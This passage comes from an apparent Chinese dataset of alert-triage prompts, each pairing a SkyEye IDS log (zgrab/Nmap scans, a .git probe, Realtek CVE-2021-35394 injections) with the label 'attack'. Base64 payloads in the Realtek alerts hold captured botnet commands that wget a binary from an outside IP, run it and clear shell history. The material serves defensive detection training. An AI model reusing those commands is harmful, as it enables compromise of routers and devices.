*/*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "20.225.1.106", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "8e92c0757fd0b686d9fd85100838e2b6", "sport": "49512", "h_url": "/actuator/health", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732661127", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.69.85", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732661127, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.23.69.85", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 443, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "159.89.2.246", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 16185, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACWCUhAAC0GsF6fWQL2rBdFVT85AbvDXfO43vYcA1AYAfaO5gAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 06:45:27", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFAACWCUhAAC0GsF6fWQL2rBdFVT85AbvDXfO43vYcA1AYAfaO5gAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.69.85", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "0f2d5e35bb9d6a898e8cf0f706967763", "proto": "ssl", "xff": "", "alarm_id": "20241127_5e05d4c6fe37fe7de8c75fec8202266f", "attack_chain": "0x01050000", "access_time": "2024-11-27 06:45:27", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732661125", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "159.89.2.246", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "159.89.2.246", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "16185", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732660215", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732660215, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "87.120.125.34", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 59841}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEwOjgwDQpVc2VyLUFnZW50OiBHby1odHRwLWNsaWVudC8xLjENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.10:80", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.10:80/.git/config", "first_access_time": "2024-11-27 06:30:15", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "保加利亚--布尔加斯州--布尔加斯", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "d44978f8707e86aee121f7247d01e3e8", "proto": "http", "xff": "", "alarm_id": "20241127_51de0734164a121f9ec175975a63bbb9", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 06:30:15", "attack_addr": "保加利亚--布尔加斯州--布尔加斯(42.510821/27.471956)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732660196", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "87.120.125.34", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.10:80\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "87.120.125.34", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"software\": \"Go-http-client/1.1\", \"hw_type\": \"PC\"}}", "host_md5": "bfb017095d15434f005e64a8ee941a7a", "sport": "59841", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Go-http-client/1.1"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732656383", "vlan_id": "", "vuln_type": "Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "attack_type": "代码执行", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.30.81.14", "sip_group": "", "repeat_count": "1", "type": "代码执行", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732656383, "rule_name": "Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "hit_field": "", "description": "1", "dip": "172.30.81.14", "protocol_id": 17, "hit_end": 5, "uri": "", "cnnvd_id": "", "dport": 9034, "rule_version": "3.0.1122.14572", "hit_start": 0, "detail_info": "Realtek Jungle SDK 提供了一个名为“MP Daemon”的诊断工具,通常编译为“UDPServer”二进制文件。该二进制文件受多个内存损坏漏洞和任意命令注入漏洞的影响,远程未经身份验证的攻击者可以利用这些漏洞,在目标系统上执行任意操作系统命令。\r\n受影响版本:\r\nv2.x 至 v3.4.14b", "packet_size": 145, "appid": 0, "proto": "udp", "xff": "", "sip": "194.50.16.198", "attack_method": "远程", "affected_system": "", "sig_id": 3587, "sport": 55659, "bulletin": "目前厂商已经发布了升级补丁以修复这个安全问题,补丁链接:http://www.realtek.com.tw/default.aspx"}, "hit_start": "0", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACD1DEAAPIRJBPCMhDGrB5RDtlrI0oAbwAAb3JmO2NkIC90bXA7cm0gLXJmICo7L2Jpbi9idXN5Ym94IHdnZXQgaHR0cDovLzY1LjE3NS4xNDAuMTY0L2ltYWdlcy9ibGluaztjaG1vZCA3NzcgKjsuL2JsaW5rIHJlYWx0ZWsgIw=="}, "detail_info": "Realtek Jungle SDK 提供了一个名为“MP Daemon”的诊断工具,通常编译为“UDPServer”二进制文件。该二进制文件受多个内存损坏漏洞和任意命令注入漏洞的影响,远程未经身份验证的攻击者可以利用这些漏洞,在目标系统上执行任意操作系统命令。\r\n受影响版本:\r\nv2.x 至 v3.4.14b", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 05:26:23", "hazard_level": "8", "hazard_rating": "危急", "rule_name": "Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "packet_data": "ACSs3Z37AJShXm6HCABFAACD1DEAAPIRJBPCMhDGrB5RDtlrI0oAbwAAb3JmO2NkIC90bXA7cm0gLXJmICo7L2Jpbi9idXN5Ym94IHdnZXQgaHR0cDovLzY1LjE3NS4xNDAuMTY0L2ltYWdlcy9ibGluaztjaG1vZCA3NzcgKjsuL2JsaW5rIHJlYWx0ZWsgIw==", "hit_field": "", "sip_addr": "荷兰--弗莱福兰省--莱利斯塔德", "protocol_id": "17", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.30.81.14", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "00b4e1ac162c8921b6b14a08d1093431", "proto": "udp", "xff": "", "alarm_id": "20241127_bac400045c29fbfb8b5631beea20191a", "attack_chain": "0x02020000", "access_time": "2024-11-27 05:26:23", "attack_addr": "荷兰--弗莱福兰省--莱利斯塔德(52.518548/5.471568)", "type_chain": "16030000", "description": "1", "dip_addr": "局域网", "dport": "9034", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732656381", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "194.50.16.198", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "高", "super_type": "攻击利用", "super_attack_chain": "0x02000000", "hit_end": "5", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x5e11", "attack_org": "", "is_white": "0", "packet_size": "145", "alarm_sample": "1", "appid": "0", "attack_sip": "194.50.16.198", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "24081-Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "rule_labels": "{\"dns\": {\"dns\": [{\"request\": \"\", \"answers\": [{\"type\": \"A\", \"data\": \"T1190\"}]}]}, \"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"65.175.140.164\", \"proto\": \"TCP\"}}", "sig_id": "3587", "host_md5": "", "sport": "55659", "bulletin": "目前厂商已经发布了升级补丁以修复这个安全问题,补丁链接:http://www.realtek.com.tw/default.aspx"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732652866", "vlan_id": "", "vuln_type": "Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "attack_type": "代码执行", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.30.81.14", "sip_group": "", "repeat_count": "1", "type": "代码执行", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732652866, "rule_name": "Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "hit_field": "", "description": "1", "dip": "172.30.81.14", "protocol_id": 17, "hit_end": 5, "uri": "", "cnnvd_id": "", "dport": 9034, "rule_version": "3.0.1122.14572", "hit_start": 0, "detail_info": "Realtek Jungle SDK 提供了一个名为“MP Daemon”的诊断工具,通常编译为“UDPServer”二进制文件。该二进制文件受多个内存损坏漏洞和任意命令注入漏洞的影响,远程未经身份验证的攻击者可以利用这些漏洞,在目标系统上执行任意操作系统命令。\r\n受影响版本:\r\nv2.x 至 v3.4.14b", "packet_size": 174, "appid": 139, "proto": "unknown", "xff": "", "sip": "141.98.11.175", "attack_method": "远程", "affected_system": "", "sig_id": 3587, "sport": 42630, "bulletin": "目前厂商已经发布了升级补丁以修复这个安全问题,补丁链接:http://www.realtek.com.tw/default.aspx"}, "hit_start": "0", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACg1DEAAPERXt2NYguvrB5RDqaGI0oAjAAAb3JmO2NkIC90bXA7IHJtIC1yZiBxa2VodXNsOyAvYmluL2J1c3lib3ggd2dldCBodHRwOi8vMTU0LjIxNi4xNy4xMDkvdGVsbmV0L3FrZWh1c2w7IGNobW9kICt4IHFrZWh1c2w7IC4vcWtlaHVzbCBtcHNsOyBoaXN0b3J5IC1jOyAj"}, "detail_info": "Realtek Jungle SDK 提供了一个名为“MP Daemon”的诊断工具,通常编译为“UDPServer”二进制文件。该二进制文件受多个内存损坏漏洞和任意命令注入漏洞的影响,远程未经身份验证的攻击者可以利用这些漏洞,在目标系统上执行任意操作系统命令。\r\n受影响版本:\r\nv2.x 至 v3.4.14b", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 04:27:46", "hazard_level": "8", "hazard_rating": "危急", "rule_name": "Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "packet_data": "ACSs3Z37AJShXm6HCABFAACg1DEAAPERXt2NYguvrB5RDqaGI0oAjAAAb3JmO2NkIC90bXA7IHJtIC1yZiBxa2VodXNsOyAvYmluL2J1c3lib3ggd2dldCBodHRwOi8vMTU0LjIxNi4xNy4xMDkvdGVsbmV0L3FrZWh1c2w7IGNobW9kICt4IHFrZWh1c2w7IC4vcWtlaHVzbCBtcHNsOyBoaXN0b3J5IC1jOyAj", "hit_field": "", "sip_addr": "立陶宛--考纳斯县--考纳斯", "protocol_id": "17", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.30.81.14", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "4b46cfb5696c843557b740da54feab95", "proto": "unknown", "xff": "", "alarm_id": "20241127_e655486ab169f581fbc6c3d62dc15f83", "attack_chain": "0x02020000", "access_time": "2024-11-27 04:27:46", "attack_addr": "立陶宛--考纳斯县--考纳斯(54.895145/23.904039)", "type_chain": "16030000", "description": "1", "dip_addr": "局域网", "dport": "9034", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732652867", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "141.98.11.175", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "高", "super_type": "攻击利用", "super_attack_chain": "0x02000000", "hit_end": "5", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x5e11", "attack_org": "", "is_white": "0", "packet_size": "174", "alarm_sample": "1", "appid": "139", "attack_sip": "141.98.11.175", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "24081-Realtek SDK 任意命令注入漏洞(CVE-2021-35394)", "rule_labels": "{\"dns\": {\"dns\": [{\"request\": \"\", \"answers\": [{\"type\": \"A\", \"data\": \"T1190\"}]}]}, \"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"154.216.17.109\", \"proto\": \"TCP\"}}", "sig_id": "3587", "host_md5": "", "sport": "42630", "bulletin": "目前厂商已经发布了升级补丁以修复这个安全问题,补丁链接:http://www.realtek.com.tw/default.aspx"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732652567", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "省公司", "is_web_attack": "1", "nid": "", "dip": "172.23.68.230", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732652567, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.230", "site_app": "", "hit_end": 68, "uri": "/ab2g", "dport": 18110, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 502, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 48, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "70.39.75.176", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 26216}, "solution": "关闭不必要的端口。", "hit_start": "48", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hYjJnIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuMzgNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIHpncmFiLzAueA0KQWNjZXB0OiAqLyoNCg0K", "req_body": "", "rsp_header": "SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpEYXRlOiBUdWUsIDI2IE5vdiAyMDI0IDIwOjIyOjQ4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAxNjYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClZpYTogSFRUUC8xLjEgU0xCLjEzMQ0KDQo=", "rsp_body": "PGh0bWw+DQo8aGVhZD48dGl0bGU+NTAyIEJhZCBHYXRld2F5PC90aXRsZT48L2hlYWQ+DQo8Ym9keSBiZ2NvbG9yPSJ3aGl0ZSI+DQo8Y2VudGVyPjxoMT41MDIgQmFkIEdhdGV3YXk8L2gxPjwvY2VudGVyPg0KPGhyPjxjZW50ZXI+bmdpbng8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4NCg=="}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.38", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.38/ab2g", "first_access_time": "2024-11-27 04:22:47", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "<html>\r\n<head><title>502 Bad Gateway</title></head>\r\n<body bgcolor=\"white\">\r\n<center><h1>502 Bad Gateway</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n", "h_method": "GET", "sip_addr": "美国--科罗拉多州--丹佛", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.7", "alarm_source": "天眼分析平台-8", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.23.68.230", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "ebcb899fc1a55e68d5e105576709143e", "proto": "http", "xff": "", "alarm_id": "20241127_1a82c7fae13ca051c67184bb2c738011", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 04:22:47", "attack_addr": "美国--科罗拉多州--丹佛(39.740230/-104.992000)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "中国--湖南省--长沙市", "dport": "18110", "alert_devip": "172.31.191.8", "rsp_status": "502", "update_time": "1732652507", "code_language": "", "branch_id": "QbJK/fzEi", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "70.39.75.176", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/jYtc", "url_path": "/ab2g", "src_mac": "00:24:ac:22:84:33", "file_name": "", "confidence": "高", "rsp_header": "HTTP/1.1 502 Bad Gateway\r\nDate: Tue, 26 Nov 2024 20:22:48 GMT\r\nContent-Type: text/html\r\nContent-Length: 166\r\nConnection: keep-alive\r\nVia: HTTP/1.1 SLB.131\r\n\r\n", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "68", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/jYtc", "uri": "/ab2g", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET /ab2g HTTP/1.1\r\nHost: 218.76.15.38\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "70.39.75.176", "rule_state": "green", "asset_group": "省公司", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "bd639b28d99e60fa10fe1a114c94a472", "sport": "26216", "h_url": "/ab2g", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732646442", "vlan_id": "", "vuln_type": "发现黑客工具Nmap扫描行为", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732646442, "vuln_harm": "攻击者可通过Nmap获悉目标端口的状态及端口上运行服务的详细信息,并针对开启的端口进行攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "", "hit_end": 39, "uri": "/nice%20ports%2C/Tri%6Eity.txt%2ebak", "dport": 80, "vuln_name": "发现黑客工具Nmap扫描行为", "rsp_status": 0, "code_language": "", "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵。", "hit_start": 19, "detail_info": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "xff": "", "sip": "161.35.17.177", "vuln_desc": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "public_date": "2023-03-17 16:10:21", "sport": 18927}, "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵。", "hit_start": "19", "skyeye_id": "", "payload": {"req_header": "R0VUIC9uaWNlJTIwcG9ydHMlMkMvVHJpJTZFaXR5LnR4dCUyZWJhayBIVFRQLzEuMA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "file_md5": "98523bf24fc44ed6a0b2e66163dc2ac7", "host": "", "host_state": "失败", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 02:40:42", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "德国--黑森州--美因河畔法兰克福", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现黑客工具Nmap扫描行为", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "5b98d3611e7fc1ce8db94cc1be6d6a6c", "proto": "http", "xff": "", "alarm_id": "20241127_61856906275a752b28debd2265b6663b", "vuln_desc": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "attack_chain": "0x01010000", "access_time": "2024-11-27 02:40:42", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "140E0000", "vuln_harm": 